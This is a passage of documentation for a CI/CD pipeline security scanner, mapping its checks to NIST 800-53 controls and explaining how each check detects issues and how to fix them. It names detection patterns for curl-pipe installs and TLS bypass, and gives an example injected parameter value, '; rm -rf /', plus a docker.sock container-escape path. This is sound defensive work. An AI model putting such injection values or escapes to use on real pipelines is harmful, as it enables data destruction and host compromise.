GHA-002 |
pull_request_target checks out PR head | CRITICAL | GitHub Actions | 🔧 fix |
GHA-003 |
Script injection via untrusted context | HIGH | GitHub Actions | 🔧 fix |
GHA-035 |
github-script step interpolates untrusted context | HIGH | GitHub Actions | |
GL-002 |
Script injection via untrusted commit/MR context | HIGH | GitLab CI | |
TKN-003 |
Tekton param interpolated unsafely in step script | CRITICAL | Tekton |
SA-15: Development Process, Standards, and Tools
Evidenced by 5 checks across 3 providers (AWS, CircleCI, GitHub Actions).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
CC-002 |
Script injection via untrusted environment variable | HIGH | CircleCI | |
CC-009 |
Deploy job missing manual approval gate | MEDIUM | CircleCI | |
CC-012 |
Dynamic config via setup: true enables code injection |
MEDIUM | CircleCI | |
CP-001 |
No approval action before deploy stages | HIGH | AWS | |
GHA-003 |
Script injection via untrusted context | HIGH | GitHub Actions | 🔧 fix |
SC-7: Boundary Protection
Evidenced by 22 checks across 6 providers (AWS, Argo Workflows, Cloud Build, Dockerfile, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ARGO-004 |
Argo workflow mounts hostPath or shares host namespaces | CRITICAL | Argo Workflows | |
CA-003 |
CodeArtifact domain policy allows cross-account wildcard | CRITICAL | AWS | |
CCM-003 |
CodeCommit trigger targets SNS/Lambda in a different account | MEDIUM | AWS | |
DF-013 |
EXPOSE declares sensitive remote-access port | CRITICAL | Dockerfile | 🔧 fix |
ECR-003 |
Repository policy allows public access | CRITICAL | AWS | |
GCB-021 |
No private worker pool, build runs on the shared default pool | MEDIUM | Cloud Build | 🔧 fix |
K8S-002 |
Pod hostNetwork: true | HIGH | Kubernetes | 🔧 fix |
K8S-003 |
Pod hostPID: true | HIGH | Kubernetes | 🔧 fix |
K8S-004 |
Pod hostIPC: true | HIGH | Kubernetes | 🔧 fix |
K8S-013 |
Pod uses a hostPath volume | HIGH | Kubernetes | 🔧 fix |
K8S-014 |
Pod hostPath references a sensitive host directory | CRITICAL | Kubernetes | |
K8S-022 |
Service exposes SSH (port 22) | MEDIUM | Kubernetes | |
K8S-026 |
LoadBalancer Service has no loadBalancerSourceRanges | HIGH | Kubernetes | |
K8S-028 |
Container declares hostPort | MEDIUM | Kubernetes | 🔧 fix |
K8S-030 |
Workload schedules onto a control-plane node | HIGH | Kubernetes | 🔧 fix |
K8S-032 |
Namespace lacks default-deny NetworkPolicy | MEDIUM | Kubernetes | |
K8S-038 |
NetworkPolicy ingress / egress allows all sources or destinations | MEDIUM | Kubernetes | |
LMB-004 |
Lambda resource policy allows wildcard principal | CRITICAL | AWS | |
PBAC-001 |
CodeBuild project has no VPC configuration | HIGH | AWS | |
S3-001 |
Artifact bucket public access block not fully enabled | CRITICAL | AWS | |
SM-002 |
Secrets Manager resource policy allows wildcard principal | CRITICAL | AWS | |
TKN-004 |
Tekton Task mounts hostPath or shares host namespaces | CRITICAL | Tekton |
SC-8: Transmission Confidentiality and Integrity
Evidenced by 9 checks across 8 providers (AWS, Argo Workflows, Buildkite, CircleCI, Cloud Build, Helm, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ARGO-008 |
Argo script source pipes remote install or disables TLS | HIGH | Argo Workflows | 🔧 fix |
BK-008 |
TLS verification disabled in step command | MEDIUM | Buildkite | 🔧 fix |
CC-023 |
TLS / certificate verification bypass | HIGH | CircleCI | 🔧 fix |
GCB-011 |
TLS / certificate verification bypass | HIGH | Cloud Build | 🔧 fix |
HELM-003 |
Chart dependency declared on a non-HTTPS repository | HIGH | Helm | 🔧 fix |
HELM-009 |
Chart home / sources URL uses a non-HTTPS scheme | LOW | Helm | |
K8S-027 |
Ingress has no TLS configuration | MEDIUM | Kubernetes | |
S3-005 |
Artifact bucket missing aws:SecureTransport deny | MEDIUM | AWS | |
TKN-008 |
Tekton step script pipes remote install or disables TLS | HIGH | Tekton | 🔧 fix |
SC-12: Cryptographic Key Establishment and Management
Evidenced by 9 checks across AWS.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
CA-001 |
CodeArtifact domain not encrypted with customer KMS CMK | MEDIUM | AWS | |
CCM-002 |
CodeCommit repository not encrypted with customer KMS CMK | MEDIUM | AWS | |
CP-002 |
Artifact store not encrypted with customer-managed KMS key | MEDIUM | AWS | |
CWL-002 |
CodeBuild log group not KMS-encrypted | MEDIUM | AWS | |
ECR-005 |
Repository encrypted with AES256 rather than KMS CMK | MEDIUM | AWS | |
KMS-001 |
KMS customer-managed key has rotation disabled | MEDIUM | AWS | |
S3-002 |
Artifact bucket server-side encryption not configured | HIGH | AWS | |
SM-001 |
Secrets Manager secret has no rotation configured | HIGH | AWS | |
SSM-002 |
SSM SecureString uses the default AWS-managed key | MEDIUM | AWS |
SC-13: Cryptographic Protection
Evidenced by 9 checks across 4 providers (AWS, Buildkite, Helm, Kubernetes).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
BK-008 |
TLS verification disabled in step command | MEDIUM | Buildkite | 🔧 fix |
CA-001 |
CodeArtifact domain not encrypted with customer KMS CMK | MEDIUM | AWS | |
CP-002 |
Artifact store not encrypted with customer-managed KMS key | MEDIUM | AWS | |
ECR-005 |
Repository encrypted with AES256 rather than KMS CMK | MEDIUM | AWS | |
HELM-003 |
Chart dependency declared on a non-HTTPS repository | HIGH | Helm | 🔧 fix |
K8S-027 |
Ingress has no TLS configuration | MEDIUM | Kubernetes | |
KMS-001 |
KMS customer-managed key has rotation disabled | MEDIUM | AWS | |
S3-002 |
Artifact bucket server-side encryption not configured | HIGH | AWS | |
SSM-002 |
SSM SecureString uses the default AWS-managed key | MEDIUM | AWS |
SC-28: Protection of Information at Rest
Evidenced by 12 checks across 6 providers (AWS, Argo Workflows, Buildkite, Dockerfile, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ARGO-006 |
Literal secret value in Argo template env or parameter default | CRITICAL | Argo Workflows | 🔧 fix |
BK-002 |
Literal secret value in pipeline env block | CRITICAL | Buildkite | 🔧 fix |
CCM-002 |
CodeCommit repository not encrypted with customer KMS CMK | MEDIUM | AWS | |
CP-002 |
Artifact store not encrypted with customer-managed KMS key | MEDIUM | AWS | |
CWL-002 |
CodeBuild log group not KMS-encrypted | MEDIUM | AWS | |
DF-019 |
COPY/ADD source path looks like a credential file | HIGH | Dockerfile | 🔧 fix |
ECR-005 |
Repository encrypted with AES256 rather than KMS CMK | MEDIUM | AWS | |
K8S-008 |
Container readOnlyRootFilesystem not true | MEDIUM | Kubernetes | 🔧 fix |
K8S-018 |
Secret stringData/data carries a credential-shaped literal | CRITICAL | Kubernetes | |
K8S-037 |
ConfigMap data carries a credential-shaped literal | HIGH | Kubernetes | |
S3-002 |
Artifact bucket server-side encryption not configured | HIGH | AWS | |
TKN-005 |
Literal secret value in Tekton step env or param default | CRITICAL | Tekton | 🔧 fix |
SI-2: Flaw Remediation
Evidenced by 33 checks across 13 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-001 |
Task reference not pinned to specific version | HIGH | Azure DevOps | 🔧 fix |
ARGO-001 |
Argo template container image not pinned to a digest | HIGH | Argo Workflows | |
ARGO-007 |
Argo workflow has no activeDeadlineSeconds | LOW | Argo Workflows | |
ARGO-012 |
No vulnerability scanning step | MEDIUM | Argo Workflows | |
BB-001 |
pipe: action not pinned to exact version | HIGH | Bitbucket | 🔧 fix |
BB-029 |
image: (step or service) not pinned by sha256 digest | HIGH | Bitbucket | |
BK-001 |
Buildkite plugin not pinned to an exact version | HIGH | Buildkite | |
BK-006 |
Step has no timeout_in_minutes | LOW | Buildkite | |
BK-012 |
No vulnerability scanning step | MEDIUM | Buildkite | |
CB-005 |
Outdated managed build image | MEDIUM | AWS | |
CC-001 |
Orb not pinned to exact semver | HIGH | CircleCI | 🔧 fix |
CC-003 |
Docker image not pinned by digest | HIGH | CircleCI | |
CC-020 |
No vulnerability scanning step | MEDIUM | CircleCI | |
CC-022 |
Dependency update command bypasses lockfile pins | MEDIUM | CircleCI | 🔧 fix |
CW-001 |
No CloudWatch alarm on CodeBuild FailedBuilds metric | LOW | AWS | |
DF-001 |
FROM image not pinned to sha256 digest | HIGH | Dockerfile | 🔧 fix |
DF-007 |
No HEALTHCHECK directive declared | LOW | Dockerfile | 🔧 fix |
DF-010 |
apt-get dist-upgrade / upgrade pulls unknown package versions | LOW | Dockerfile | |
EB-001 |
No EventBridge rule for CodePipeline failure notifications | MEDIUM | AWS | |
ECR-001 |
Image scanning on push not enabled | HIGH | AWS | |
GCB-001 |
Cloud Build step image not pinned by digest | HIGH | Cloud Build | 🔧 fix |
GCB-008 |
No vulnerability scanning step in Cloud Build pipeline | MEDIUM | Cloud Build | |
GCB-025 |
Build has no tags for audit / discoverability | LOW | Cloud Build | |
GHA-001 |
Action not pinned to commit SHA | HIGH | GitHub Actions | 🔧 fix |
GL-001 |
Image not pinned to specific version or digest | HIGH | GitLab CI | 🔧 fix |
HELM-004 |
Chart dependency version is a range, not an exact pin | MEDIUM | Helm | |
HELM-008 |
Chart.lock generated more than 90 days ago | MEDIUM | Helm | |
K8S-001 |
Container image not pinned by sha256 digest | HIGH | Kubernetes | 🔧 fix |
K8S-024 |
Container missing both livenessProbe and readinessProbe | MEDIUM | Kubernetes | |
K8S-033 |
Namespace lacks ResourceQuota or LimitRange | MEDIUM | Kubernetes | |
TKN-001 |
Tekton step image not pinned to a digest | HIGH | Tekton | |
TKN-006 |
Tekton run lacks an explicit timeout | LOW | Tekton | |
TKN-012 |
No vulnerability scanning step | MEDIUM | Tekton |
SI-7: Software, Firmware, and Information Integrity
Evidenced by 33 checks across 13 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-002 |
Script injection via attacker-controllable context | HIGH | Azure DevOps | |
ARGO-004 |
Argo workflow mounts hostPath or shares host namespaces | CRITICAL | Argo Workflows | |
ARGO-008 |
Argo script source pipes remote install or disables TLS | HIGH | Argo Workflows | 🔧 fix |
ARGO-009 |
Artifacts not signed (no cosign/sigstore step) | MEDIUM | Argo Workflows | |
ARGO-011 |
No SLSA provenance attestation produced | MEDIUM | Argo Workflows | |
BB-002 |
Script injection via attacker-controllable context | HIGH | Bitbucket | |
BK-004 |
Remote script piped into shell interpreter | HIGH | Buildkite | 🔧 fix |
BK-009 |
Artifacts not signed (no cosign/sigstore step) | MEDIUM | Buildkite | |
BK-011 |
No SLSA provenance attestation produced | MEDIUM | Buildkite | |
CC-006 |
Artifacts not signed (no cosign/sigstore step) | MEDIUM | CircleCI | |
CP-002 |
Artifact store not encrypted with customer-managed KMS key | MEDIUM | AWS | |
CT-002 |
CloudTrail log-file validation disabled | MEDIUM | AWS | |
DF-003 |
ADD pulls remote URL without integrity verification | HIGH | Dockerfile | |
DF-004 |
RUN executes a remote script via curl-pipe / wget-pipe | HIGH | Dockerfile | |
ECR-002 |
Image tags are mutable | HIGH | AWS | |
GCB-009 |
Artifacts not signed (no cosign / sigstore step) | MEDIUM | Cloud Build | |
GCB-017 |
Image-producing build does not request SLSA provenance | MEDIUM | Cloud Build | |
GHA-002 |
pull_request_target checks out PR head | CRITICAL | GitHub Actions | 🔧 fix |
GHA-035 |
github-script step interpolates untrusted context | HIGH | GitHub Actions | |
GL-002 |
Script injection via untrusted commit/MR context | HIGH | GitLab CI | |
HELM-002 |
Chart.lock missing per-dependency digests | HIGH | Helm | 🔧 fix |
K8S-010 |
Container seccompProfile not RuntimeDefault or Localhost | MEDIUM | Kubernetes | |
K8S-013 |
Pod uses a hostPath volume | HIGH | Kubernetes | 🔧 fix |
K8S-014 |
Pod hostPath references a sensitive host directory | CRITICAL | Kubernetes | |
K8S-036 |
ServiceAccount imagePullSecrets references missing Secret | MEDIUM | Kubernetes | |
LMB-001 |
Lambda function has no code-signing config | HIGH | AWS | |
S3-003 |
Artifact bucket versioning not enabled | MEDIUM | AWS | |
SIGN-001 |
No AWS Signer profile defined for Lambda deploys | MEDIUM | AWS | |
SIGN-002 |
AWS Signer profile is revoked or inactive | HIGH | AWS | |
TKN-004 |
Tekton Task mounts hostPath or shares host namespaces | CRITICAL | Tekton | |
TKN-008 |
Tekton step script pipes remote install or disables TLS | HIGH | Tekton | 🔧 fix |
TKN-009 |
Artifacts not signed (no cosign/sigstore step) | MEDIUM | Tekton | |
TKN-011 |
No SLSA provenance attestation produced | MEDIUM | Tekton |
SR-3: Supply Chain Controls and Processes
Evidenced by 39 checks across 14 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, Jenkins, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-001 |
Task reference not pinned to specific version | HIGH | Azure DevOps | 🔧 fix |
ADO-005 |
Container image not pinned to specific version | HIGH | Azure DevOps | |
ARGO-001 |
Argo template container image not pinned to a digest | HIGH | Argo Workflows | |
ARGO-008 |
Argo script source pipes remote install or disables TLS | HIGH | Argo Workflows | 🔧 fix |
BB-001 |
pipe: action not pinned to exact version | HIGH | Bitbucket | 🔧 fix |
BB-029 |
image: (step or service) not pinned by sha256 digest | HIGH | Bitbucket | |
BK-001 |
Buildkite plugin not pinned to an exact version | HIGH | Buildkite | |
BK-004 |
Remote script piped into shell interpreter | HIGH | Buildkite | 🔧 fix |
CA-002 |
CodeArtifact repository has a public external connection | HIGH | AWS | |
CC-001 |
Orb not pinned to exact semver | HIGH | CircleCI | 🔧 fix |
CC-003 |
Docker image not pinned by digest | HIGH | CircleCI | |
CC-016 |
Remote script piped to shell interpreter | HIGH | CircleCI | 🔧 fix |
CC-018 |
Package install from insecure source | HIGH | CircleCI | 🔧 fix |
CC-021 |
Package install without lockfile enforcement | MEDIUM | CircleCI | 🔧 fix |
CC-022 |
Dependency update command bypasses lockfile pins | MEDIUM | CircleCI | 🔧 fix |
DF-001 |
FROM image not pinned to sha256 digest | HIGH | Dockerfile | 🔧 fix |
DF-003 |
ADD pulls remote URL without integrity verification | HIGH | Dockerfile | |
DF-004 |
RUN executes a remote script via curl-pipe / wget-pipe | HIGH | Dockerfile | |
DF-010 |
apt-get dist-upgrade / upgrade pulls unknown package versions | LOW | Dockerfile | |
ECR-003 |
Repository policy allows public access | CRITICAL | AWS | |
GCB-001 |
Cloud Build step image not pinned by digest | HIGH | Cloud Build | 🔧 fix |
GCB-010 |
Remote script piped to shell interpreter | HIGH | Cloud Build | |
GCB-013 |
Package install bypasses registry integrity (git / path / tarball) | MEDIUM | Cloud Build | |
GHA-001 |
Action not pinned to commit SHA | HIGH | GitHub Actions | 🔧 fix |
GL-001 |
Image not pinned to specific version or digest | HIGH | GitLab CI | 🔧 fix |
GL-005 |
include: pulls remote / project without pinned ref | HIGH | GitLab CI | |
HELM-001 |
Chart.yaml declares legacy apiVersion: v1 | MEDIUM | Helm | 🔧 fix |
HELM-002 |
Chart.lock missing per-dependency digests | HIGH | Helm | 🔧 fix |
HELM-003 |
Chart dependency declared on a non-HTTPS repository | HIGH | Helm | 🔧 fix |
HELM-004 |
Chart dependency version is a range, not an exact pin | MEDIUM | Helm | |
HELM-005 |
Chart maintainers field empty or missing chain-of-custody info | LOW | Helm | |
HELM-007 |
Chart.yaml description field is empty or missing | LOW | Helm | |
HELM-008 |
Chart.lock generated more than 90 days ago | MEDIUM | Helm | |
HELM-009 |
Chart home / sources URL uses a non-HTTPS scheme | LOW | Helm | |
JF-001 |
Shared library not pinned to a tag or commit | HIGH | Jenkins | |
K8S-001 |
Container image not pinned by sha256 digest | HIGH | Kubernetes | 🔧 fix |
K8S-036 |
ServiceAccount imagePullSecrets references missing Secret | MEDIUM | Kubernetes | |
TKN-001 |
Tekton step image not pinned to a digest | HIGH | Tekton | |
TKN-008 |
Tekton step script pipes remote install or disables TLS | HIGH | Tekton | 🔧 fix |
SR-4: Provenance
Evidenced by 24 checks across 8 providers (AWS, Argo Workflows, Buildkite, CircleCI, Cloud Build, Dockerfile, Helm, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ARGO-009 |
Artifacts not signed (no cosign/sigstore step) | MEDIUM | Argo Workflows | |
ARGO-010 |
No SBOM generated for build artifacts | MEDIUM | Argo Workflows | |
ARGO-011 |
No SLSA provenance attestation produced | MEDIUM | Argo Workflows | |
BK-009 |
Artifacts not signed (no cosign/sigstore step) | MEDIUM | Buildkite | |
BK-010 |
No SBOM generated for build artifacts | MEDIUM | Buildkite | |
BK-011 |
No SLSA provenance attestation produced | MEDIUM | Buildkite | |
CC-006 |
Artifacts not signed (no cosign/sigstore step) | MEDIUM | CircleCI | |
CC-007 |
SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) | MEDIUM | CircleCI | |
CP-002 |
Artifact store not encrypted with customer-managed KMS key | MEDIUM | AWS | |
DF-016 |
Image lacks OCI provenance labels | LOW | Dockerfile | |
ECR-002 |
Image tags are mutable | HIGH | AWS | |
ECR-005 |
Repository encrypted with AES256 rather than KMS CMK | MEDIUM | AWS | |
GCB-007 |
availableSecrets references versions/latest |
MEDIUM | Cloud Build | 🔧 fix |
GCB-009 |
Artifacts not signed (no cosign / sigstore step) | MEDIUM | Cloud Build | |
GCB-015 |
SBOM not produced (no CycloneDX / syft / Trivy-SBOM step) | MEDIUM | Cloud Build | |
GCB-017 |
Image-producing build does not request SLSA provenance | MEDIUM | Cloud Build | |
GCB-024 |
Build pushes Docker images but top-level images: is empty | LOW | Cloud Build | |
HELM-005 |
Chart maintainers field empty or missing chain-of-custody info | LOW | Helm | |
LMB-001 |
Lambda function has no code-signing config | HIGH | AWS | |
SIGN-001 |
No AWS Signer profile defined for Lambda deploys | MEDIUM | AWS | |
SIGN-002 |
AWS Signer profile is revoked or inactive | HIGH | AWS | |
TKN-009 |
Artifacts not signed (no cosign/sigstore step) | MEDIUM | Tekton | |
TKN-010 |
No SBOM generated for build artifacts | MEDIUM | Tekton | |
TKN-011 |
No SLSA provenance attestation produced | MEDIUM | Tekton |
SR-11: Component Authenticity
Evidenced by 31 checks across 14 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, Jenkins, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-001 |
Task reference not pinned to specific version | HIGH | Azure DevOps | 🔧 fix |
ADO-005 |
Container image not pinned to specific version | HIGH | Azure DevOps | |
ARGO-001 |
Argo template container image not pinned to a digest | HIGH | Argo Workflows | |
ARGO-008 |
Argo script source pipes remote install or disables TLS | HIGH | Argo Workflows | 🔧 fix |
BB-001 |
pipe: action not pinned to exact version | HIGH | Bitbucket | 🔧 fix |
BB-029 |
image: (step or service) not pinned by sha256 digest | HIGH | Bitbucket | |
BK-001 |
Buildkite plugin not pinned to an exact version | HIGH | Buildkite | |
BK-004 |
Remote script piped into shell interpreter | HIGH | Buildkite | 🔧 fix |
CA-002 |
CodeArtifact repository has a public external connection | HIGH | AWS | |
CC-001 |
Orb not pinned to exact semver | HIGH | CircleCI | 🔧 fix |
CC-003 |
Docker image not pinned by digest | HIGH | CircleCI | |
CC-016 |
Remote script piped to shell interpreter | HIGH | CircleCI | 🔧 fix |
CC-018 |
Package install from insecure source | HIGH | CircleCI | 🔧 fix |
CC-021 |
Package install without lockfile enforcement | MEDIUM | CircleCI | 🔧 fix |
DF-001 |
FROM image not pinned to sha256 digest | HIGH | Dockerfile | 🔧 fix |
DF-003 |
ADD pulls remote URL without integrity verification | HIGH | Dockerfile | |
DF-004 |
RUN executes a remote script via curl-pipe / wget-pipe | HIGH | Dockerfile | |
ECR-002 |
Image tags are mutable | HIGH | AWS | |
GCB-001 |
Cloud Build step image not pinned by digest | HIGH | Cloud Build | 🔧 fix |
GCB-010 |
Remote script piped to shell interpreter | HIGH | Cloud Build | |
GCB-013 |
Package install bypasses registry integrity (git / path / tarball) | MEDIUM | Cloud Build | |
GHA-001 |
Action not pinned to commit SHA | HIGH | GitHub Actions | 🔧 fix |
GL-001 |
Image not pinned to specific version or digest | HIGH | GitLab CI | 🔧 fix |
GL-005 |
include: pulls remote / project without pinned ref | HIGH | GitLab CI | |
HELM-002 |
Chart.lock missing per-dependency digests | HIGH | Helm | 🔧 fix |
HELM-004 |
Chart dependency version is a range, not an exact pin | MEDIUM | Helm | |
JF-001 |
Shared library not pinned to a tag or commit | HIGH | Jenkins | |
K8S-001 |
Container image not pinned by sha256 digest | HIGH | Kubernetes | 🔧 fix |
K8S-036 |
ServiceAccount imagePullSecrets references missing Secret | MEDIUM | Kubernetes | |
TKN-001 |
Tekton step image not pinned to a digest | HIGH | Tekton | |
TKN-008 |
Tekton step script pipes remote install or disables TLS | HIGH | Tekton | 🔧 fix |
Check details
Every check that evidences this standard, rendered once with its detection mechanism, recommendation, and any known false-positive modes or real-world incident references. The per-control tables above link to the matching block here.
ADO-001: Task reference not pinned to specific version HIGH 🔧 fix
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Floating-major task references (@1, @2) can roll forward silently when the task publisher ships a breaking or malicious update. Pass when every task: reference carries a two- or three-segment semver.
Recommendation. Reference tasks by a full semver (DownloadSecureFile@1.2.3) or extension-published-version. Track task updates explicitly via Azure DevOps extension settings rather than letting @1 drift.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ADO-001 in the Azure DevOps provider.
ADO-002: Script injection via attacker-controllable context HIGH
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation, SI-7 Software, Firmware, and Information Integrity.
How this is detected. $(Build.SourceBranch*), $(Build.SourceVersionMessage), and $(System.PullRequest.*) are populated from SCM event metadata the attacker controls. Inline interpolation into a script body executes crafted content.
Recommendation. Pass these values through an intermediate pipeline variable declared with readonly: true, and reference that variable through an environment variable rather than $(...) macro interpolation. ADO expands $(…) before shell quoting, so inline use is never safe.
Source: ADO-002 in the Azure DevOps provider.
ADO-003: Variables contain literal secret values CRITICAL
Evidences: IA-5 Authenticator Management.
How this is detected. Scans variables: in both the mapping form ({KEY: VAL}) and the list form ([{name: X, value: Y}]) that ADO supports. AWS keys are detected by value shape regardless of variable name.
Recommendation. Store secrets in an Azure Key Vault or a Library variable group with the secret flag set; reference them via $(SECRET_NAME) at runtime. For cloud access prefer Azure workload identity federation.
Source: ADO-003 in the Azure DevOps provider.
ADO-004: Deployment job missing environment binding MEDIUM
Evidences: AC-3 Access Enforcement, SA-10 Developer Configuration Management.
How this is detected. Without an environment: binding, ADO cannot enforce approvals, checks, or deployment history against a named resource. Every deployment: job should bind one.
Recommendation. Add environment: <name> to every deployment: job. Configure approvals, required branches, and business-hours checks on the matching Environment in the ADO UI.
Source: ADO-004 in the Azure DevOps provider.
ADO-005: Container image not pinned to specific version HIGH
Evidences: CM-2 Baseline Configuration, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Container images can be declared at resources.containers[].image or job.container (string or {image:}). Floating / untagged refs let the publisher swap the image contents.
Recommendation. Reference images by @sha256:<digest> or at minimum a full immutable version tag. Avoid :latest and untagged refs.
Source: ADO-005 in the Azure DevOps provider.
ARGO-001: Argo template container image not pinned to a digest HIGH
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Walks spec.templates[].container, spec.templates[].script, and spec.templates[].containerSet.containers[]. The image must contain @sha256: followed by a 64-char hex digest.
Recommendation. Pin every container / script template image to a content-addressable digest (alpine@sha256:<digest>). Tag-only references (alpine:3.18) and rolling tags (alpine:latest) let a compromised registry update redirect the workflow's containers at the next pull, with no audit trail in the WorkflowTemplate.
Source: ARGO-001 in the Argo Workflows provider.
ARGO-002: Argo template container runs privileged or as root HIGH
Evidences: AC-6 Least Privilege, CM-7 Least Functionality.
How this is detected. Detection fires on securityContext.privileged: true, runAsUser: 0, runAsNonRoot: false, allowPrivilegeEscalation: true, or no securityContext block at all. Also walks spec.podSpecPatch (raw YAML) for an explicit privileged: true token.
Recommendation. Set securityContext.privileged: false, runAsNonRoot: true, and allowPrivilegeEscalation: false on every template container / script. A privileged container shares the node's kernel namespaces; a malicious image then has root on the build node and breaks the boundary between workflow and cluster.
Source: ARGO-002 in the Argo Workflows provider.
ARGO-003: Argo workflow uses the default ServiceAccount MEDIUM
Evidences: AC-2 Account Management, AC-6 Least Privilege.
How this is detected. Applies to Workflow and CronWorkflow. WorkflowTemplate / ClusterWorkflowTemplate are exempt because the SA is set on the run that references them. An explicit serviceAccountName: default is treated the same as omission.
Recommendation. Set spec.serviceAccountName (or spec.workflowSpec.serviceAccountName for CronWorkflow) to a least-privilege ServiceAccount that carries only the secrets and RBAC the workflow needs. Falling back to the namespace's default SA grants access to whatever cluster-admin or wildcard role someone later binds to default, a privilege-escalation surface that should never be load-bearing for workflow pods.
Source: ARGO-003 in the Argo Workflows provider.
ARGO-004: Argo workflow mounts hostPath or shares host namespaces CRITICAL
Evidences: AC-6 Least Privilege, SC-7 Boundary Protection, SI-7 Software, Firmware, and Information Integrity.
How this is detected. Walks spec.volumes[].hostPath and the raw spec.podSpecPatch string for hostNetwork, hostPID, hostIPC, and hostPath.
Recommendation. Use emptyDir or PVC-backed volumes instead of hostPath. Drop hostNetwork: true / hostPID: true / hostIPC: true from any inline podSpecPatch. A hostPath mount of /var/run/docker.sock or / lets the workflow break out of the pod and act as the underlying node.
Source: ARGO-004 in the Argo Workflows provider.
ARGO-005: Argo input parameter interpolated unsafely in script / args CRITICAL
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation.
How this is detected. Fires on any {{inputs.parameters.X}}, {{workflow.parameters.X}}, or {{item.X}} token inside a script.source body or a container.args string that isn't already wrapped in quotes. Doesn't fire on the env-var indirection pattern, which is safe.
Recommendation. Don't interpolate {{inputs.parameters.<name>}} directly into script.source or container.args. Argo substitutes the value before the shell parses it, so a parameter containing ; rm -rf / runs as shell. Pass the parameter via env: (value: '{{inputs.parameters.<name>}}') and reference the env var quoted in the script ("$NAME"); or use inputs.artifacts for file payloads.
Source: ARGO-005 in the Argo Workflows provider.
ARGO-006: Literal secret value in Argo template env or parameter default CRITICAL 🔧 fix
Evidences: IA-5 Authenticator Management, SC-28 Protection of Information at Rest.
How this is detected. Strong matches: AWS access keys, GitHub PATs, JWTs. Weak match: env var name suggests a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) and the value is a non-empty literal rather than an interpolation.
Recommendation. Mount secrets via env.valueFrom.secretKeyRef (or a volumes: Secret mount) instead of writing the value into env.value or arguments.parameters[].value. Workflow manifests are committed to git and cluster-readable; literal values leak through normal access paths.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ARGO-006 in the Argo Workflows provider.
ARGO-007: Argo workflow has no activeDeadlineSeconds LOW
Evidences: AU-2 Event Logging, SI-2 Flaw Remediation.
How this is detected. Applies to Workflow, CronWorkflow, WorkflowTemplate, and ClusterWorkflowTemplate. The field can sit at the workflow level or on individual templates.
Recommendation. Set spec.activeDeadlineSeconds (or spec.workflowSpec.activeDeadlineSeconds on a CronWorkflow) so a hung step can't pin the workflow controller's reconcile cycle indefinitely. Pick a value generous enough for the slowest legitimate run (e.g. 3600 for a typical pipeline, 21600 for ML training). Per-template activeDeadlineSeconds is also accepted as evidence of intent.
Source: ARGO-007 in the Argo Workflows provider.
ARGO-008: Argo script source pipes remote install or disables TLS HIGH 🔧 fix
Evidences: SC-8 Transmission Confidentiality and Integrity, SI-7 Software, Firmware, and Information Integrity, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Walks script.source and joined container.args text with the cross-provider CURL_PIPE_RE and TLS_BYPASS_RE regexes.
Recommendation. Replace curl ... | sh with a download-then-verify-then-execute pattern. Drop TLS-bypass flags (curl -k, git config http.sslverify false); install the missing CA into the template image instead. Both forms let an attacker controlling DNS / a transparent proxy substitute the script the workflow runs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ARGO-008 in the Argo Workflows provider.
ARGO-009: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. Detection mirrors GHA-006 / TKN-009 / BK-009, the shared signing-token catalog (cosign, sigstore, slsa-github-generator, slsa-framework, notation-sign) is searched across every string in each Argo document. Fires only on artifact-producing Workflows / WorkflowTemplates (those that invoke docker build / docker push / kaniko / helm upgrade / aws s3 sync / etc.) so lint-only Workflows don't trip it.
Recommendation. Add a cosign step to the Workflow. The most common shape is a final sign template that runs cosign sign --yes <repo>@sha256:<digest> after the build. Sign by digest, not tag, so a re-pushed tag can't bypass the signature.
Source: ARGO-009 in the Argo Workflows provider.
ARGO-010: No SBOM generated for build artifacts MEDIUM
Evidences: CM-8 System Component Inventory, SR-4 Provenance.
